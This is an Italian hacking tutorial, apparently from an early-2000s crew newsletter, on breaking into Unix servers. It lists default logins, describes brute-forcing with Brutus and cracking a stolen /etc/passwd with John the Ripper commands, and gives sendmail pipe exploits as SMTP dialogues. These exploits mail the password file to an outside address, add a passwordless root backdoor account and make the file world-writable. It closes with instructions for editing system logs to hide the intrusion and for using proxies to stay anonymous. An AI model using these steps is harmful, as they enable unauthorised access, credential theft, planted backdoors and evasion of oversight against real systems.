LE INFORMAZIONI CONTENUTE IN QUESTO DOCUMENTO SONO
SOLO A SCOPO ILLUSTRATIVO, IO INTESTATARIO NON MI ASSUMO NESSUNA RESPONSABILITà
PER USO ILLECITO DI QUESTE.
OTTENERE UNA PASSWORD
Allora,
ciao a tutti!!!!!
Voglio avvisare tutti che non è che io sia un grande
esperto nel campo dell' hacking ma ne so semplicemente qualcosa.
Iniziamo con l' occorrente:
Programmi:
Brutus o
Unsecure
John the
ripper
NetInfo
Requisiti:
Saper usare il DOS ( john the ripper funziona solo
sotto sto sistema )
Sapere qualcosa dell' hacking
Avere un po' di pazienza e voglia di fondersi il
cervello
Io ho scritto questa guida per coloro che hanno già
letto qualche guida all' hacking e che vogliono approfondire l' argomento delle
password (come scoprirle,decriptarle.....) e non per quelli che l' hacking non
sanno nemmeno cosa sia.
Ho scritto questa guida perchè in molte guide all'
hacking non è scritto come decriptare le password,anche se è importantissimo.
Innanzi tutto procuratevi i programmi sopra citati
perchè sono indispensabili per ottenere delle password.
Poi studiate bene l' hacking e adesso passiamo ad
otttenere una pass
giusta per il sistema.
Come saprete già ci sono 3 metodi per entrare in un sistema:
-Default Login
-Password List
-Backdoors
Il primo metodo consiste nell' inserire,durante la
procedura di login, le password e i login più comuni.Alcune volte sto metodo
funziona per
la scarsa intelligenza dei sysop,che non cambiano i
login e le password
di default.Altre volte non funziona.Cmq vi do le pass
di default:
LOGIN PASSWORD
root root,
system, sysop, nomesistema, nomepersona quando il root è
fingerato (
il
finger è uno strumento per prendere informazioni
su qualcosa collegato ad
internet
), none, provare anche le password della lista sotto. Molto
importante!
sys sys, system, manager,
nomedelsistema, vedi root
daemon daemon, background, none
uucp uucp, vedi guest
tty tty
test test
unix unix, test
bin bin, system, vedi root
adm adm, admin, sys, vedi root
admin adm, admin
sysman sysman, sys, system
sysadmin sysadmin, sys, system, admin, adm
who who, none
learn learn
uuhost uuhost
guest guest,
user, anonymous, visitor, bbs, nome del sistema o
dell'organizzazione.
host host
nuucp nuucp, vedi uucp
rje rje, none, vedi root
games games, player
sysop sysop
demo demo,
nomedelsistema, none
visitor vedi
guest
anonymous vedi
guest
anon vedi
guest
user vedi
guest
nomedelsistema vedi
guest
student student, vedi guest
ftp ftp, ftpuser, vedi guest
ftpuser vedi ftp
xxcp xenix
system manager
nobody nobody, none
field service
archie archie, none
qarchie qarchie, none
whois whois, none
bbs nomedelsistema,
bbs, waffle, none
services nomedelsistema,
services, none
info nomedelsistema,
info, none
new nomedelsistema,
new, none
newuser nomedelsistema,
newuser, none
ingres none,
ingres, nomedelsistema
date date,
none
lpq lpq, none
time time, none
weather weather, forecast, none
forcast vedi weather
help help, none
test nomedelsistema, test, none
waffle vedi bbs
trouble trouble, vedi root
lp lp, printer, print, vedi
root
unmountsys unmountsys, unmount, vedi root
setup setup, vedi root
makefsys makefsys, vedi root
sysadm sysadm, sys, system, vedi
sys-adm-root
powerdown powerdown, vedi root
mountfsys mountfsys, vedi root
checkfsys checkfsys,
vedi root
Il secondo metodo consiste nello sferrare un attacco
brute force: prendete un programma tipo Unsecure o Brutus,prendete un login che
avete ricavato e attraverso una password list cercate di scoprire la password
corrispondente tramite la tecnica brute force.
Il terzo metodo consiste nello scoprire una password
per il sistema attraverso lunghe ricerche sul programmatore del sistema.
Bisogna apprendere du tutto sulla sua vita,i suoi hobby e tanto altro. Comunque
se si cerca bene si riuscirà a scoprire una qualche password per entrare.
Un altro metodo consiste nel fingerare ( tramite
Telnet:aprite il prompt di dos e digitate "telnet finger
www.serverdahackerare.com ) .
Inoltre per cercare ancora più info sul server si può
aprire il prompt di DOS e digitare "telnet whois
www.serverdahackerare.com".
Se siete fortunati grazie a questi metodi potete
addirittura riscire a leggere il file passwd. Durante il whois e il finger vi
ricordo che verrete loggati.
Mi hanno detto che se usate un server proxy attivo (
se ne trovano con una ricerca sul Web ) potete navigare in modo anonimo. Come
configurare un server proxy: nella barra di explorer andate in strumenti:
opzioni internet->connessioni adesso selezionate la connessione che usate e
andate su impostaioni, digitate l' IP del server proxy che volete usare e la
sua porta. a questo punto dovreste navigare anonimi e potete guardare il passwd
in questo modo : digitate nella barra URL:
http://www.serverdahackerare.com/ftp/etc/passwd
oppure
ftp://ftp.serverdahackerare.com/etc/passwd
Su questa tecnica non sono sicuro del fatto che non
verrete loggati,anche se in teoria dovrebbe essere così.........
Comunque se dovete usarla fatelo da qualche Internet
cafè.
Se dovete usare i proxy scaricate il prog MultiProxy
da www.multiproxy.org . Avviatelo e andate a options->menu->proxy
server list->file->import proxy list . In questo modo avete importato un lista di server
proxy ( le trovate su multiproxy.org ). Poi sempre sulla stessa schermata
andate su menu->proxy list-> test all proxyes .
A questo punto il programma testa i proxy nella lista
e evidenzia quelli attivi con un pallino verde, e potete quindi utilizzarli.
Vi ricordo che una volta scoperti dei login dovete
cercare ulteriori informazioni su di essi tramite NetInfo.
Una volta scoperta una password utilizzatela per
ottenere la password del root ( se avete avuto culo potreste averla già
ottenuta ) .Per fare questo bisogna scaricare il file /etc/passwd ( oppure
potete guardare via porta 23 il passwd file e fare 1 copia&incolla ) .
Aprite ftp e digitate login e password ottenute, a questo punto andate nella
directrory /etc e scrivete "get passwd C:\ ". A questo punto dovreste
avere scaricato in C:\ il file passwd ( vi ricordo che queste operazioni
vengono registrarte dai file log,quindi attenti ) . Attraverso il prompt di DOS
utilizzate john the ripper per decriptare il passwd file.Anche john the ripper
per decriptare le password usa una password list quindi se non riuscite ad
ottenere la pass del root provate ad usare un altra lista
( se ne trovano con un po' di ricerca sul Web ) . Per
usare il john dovete digitare questo.
C:\john-16\run>john
C:\passwd
Decripta il
passwd file con la passw list di john the ripper
C:\john-16\run>john
-w:C:\passwdlist.txt C:\passwd
Decripta il passwd file con una passwd list che gli
indichiamo noi
( nel nostro caso C:\passwdlist.txt ) .
C:\john-16\run>john
-show C:\passwd
Decripta il passwd file e mostra le password che è riuscito
a decriptare.
C:\john-16\run>john
-user:root -show C:\passwd
Decripta la password di un utente che gli indichiamo (
nel nostro caso
era il root ) e ve la fa vedere.
C.\john-16\run>john
-i C:\passwd
Vi da delle possibili password ricavate dal passwd
file ( da usare solo in casi disperati ) .
Naturalmente non vi spiego tutti i comandi del john ma
solo quelli fondamentali,perchè c'è un intero manuale sull'argomento ( nella
directory doc del john ). Io stesso ho imparato ad usarlo leggendo gli esempi proposti
dal manuale.
Se non riuscite ad ottenere nessuna pass x il sistema
8 neanche quella di un user regolare ) potete mandare una fakemail ( dovreste
saperlo fare ) . In queste fakemail inseriremo diciture che fanno incasinare il
sistema e permettono di "toccare" informazioni riservate (
naturalmente bisogna che il server da attaccare sia vulnerabile a questi bug )
. Se ad esempio vogliamo ricevere il file passwd via e-mail possiamo scrivere
una fakemail del tipo:
HELO
hacker.com
MAIL
FROM:<"|/bin/mail indirizzomittentefile@mail.net <
/etc/passwd">
RCPT
TO:<"indirizzodestinatariofile@mail.net">
DATA
questa e` una prova...
.
QUIT
Oppure x manipolare un po' il passwd file possiamo
scrivere:
HELO
hackers.com
MAIL FROM:
|/usr/ucb/tail|/usr/bin/sh
RCPT TO: prova
DATA
From: tuonome@tuamail.net
Return-Receipt-To: |nessuno
#!/bin/sh
COMANDI
.
QUIT
Al posto di "COMANDI" dobbiamo inserire
appunto dei comandi ( ovvio ) .
Ecco i comandi che possiamo inserire:
/bin/mail
tuonome@tuamail.net < /etc/passwd
X ricevere il pass via e-mail
echo
Shade::0::/usr/local:/bin/bash >> /etc/passwd
X inserire una backdoor con login Shade,accesso root e
nessuna password nel passwd file ( potete cambiare login , UID, directory e
shell ) .
chmod 777 /etc/passwd
X rendere il passwd file prelevabile da chiunque.
Naturalmente ci sono altri bug x prelevare il passwd
ma qui ho inserito
solo quelli ke conosco.
se poi non volete sfruttare queti bug collegandovi
alla porta 25 potete usare l' ftp bounce ( trovate vari tutorial su di esso in
rete ) .
Una volta ottenuta la password del root possiamo
entrare nel sistema per hackerarlo. Vi ricordo che dopo ogni hackeraggio dovete
toglierli dai file log ( spero sappiate cosa sono ) . I log vanno editati ma
non cancellati. Ecco come editarli:
I file log +
importanti sono:
/etc/log ( di default )
/tmp/log oppure /temp/var/log
/var/run
/var/log
/usr/log oppure /usr/adm/log
/usr/adm/sulog oppure /usr/adm/su_log
/usr/adm/loginlog oppure /usr/adm/acct/loginlog
/usr/adm/errlog
/usr/adm/culog
/sbin
Comunque quando
entrate in una directory in cui sono contenuti i log fatevi dare dal server la
lista dei file presenti ( per farlo digitate ls-al ).
Prima ho detto che questi file vanno modificati, non
cancellati. Ma come fare per modificarli ?
Poniamo l' esempio che debba cancellare il file log
/var/log. Dovrò digitare i seguenti comandi:
$pwd
Current
directory is /etc
$cd / ( oppure cd .. )
$cd var
$vi log
A questo punto guardo il file log e cerco le informazioni
che esso contiene su di me ,per poi cancellarle.Potete anche cancellare tutte
le lettere eccetto 2 o 3 di cui è composto il log, in modo da cancellarlo quasi
del tutto e da lasciarlo senza nessuna informazione su di voi. L' esempio di
prima era solo per far capire come
editare un file log. Se avete ancora
problemi scrivetemi,e se siete in difficoltà non trascurate di farlo perché
editare bene i log è importantissimo.
Ringraziamenti e fuck
Siamo quasi arrivati alla fine di questa guida.
Volevo ringraziare Dod x avermi insegnato ad usare i
server proxy e Multiproxy, e xkè è sempre disponibile quando sono su IRC e gli
chiedo
un aiuto e non si rompe ad aiutarmi ( o almeno non lo
da a vedere ) .
Poi volevo ringraziare il grande Wolf Otakar x avermi
dato la possibiltà di scrivere questa guida e metterla nella sua newsletter.
Infine volevo ringraziare il mitico Dejavu x aver
pubblicato la mia guida sul sito della crew NSH.....Not Same Hacker ( #nsh su
IRC ) .
Un bel fuck a tutti i lamer e ai cracker e a quei
cretini che usano Internet x intraprendere traffici illegali di bambini.
Conclusione
Bene, spero che abbiate imparato ad ottenere e
decriptare una password e ad editare i file log. Ho scritto questa guida in 2
giorni ed è la mia 1^ pubblicazione
sull' hacking......siate comprensivi.
Non so se 1 giorno scriverò una guida completa all'
hacking, chi può dirlo?Ma per il momento penso di no.
Ciao e alla prossima.:)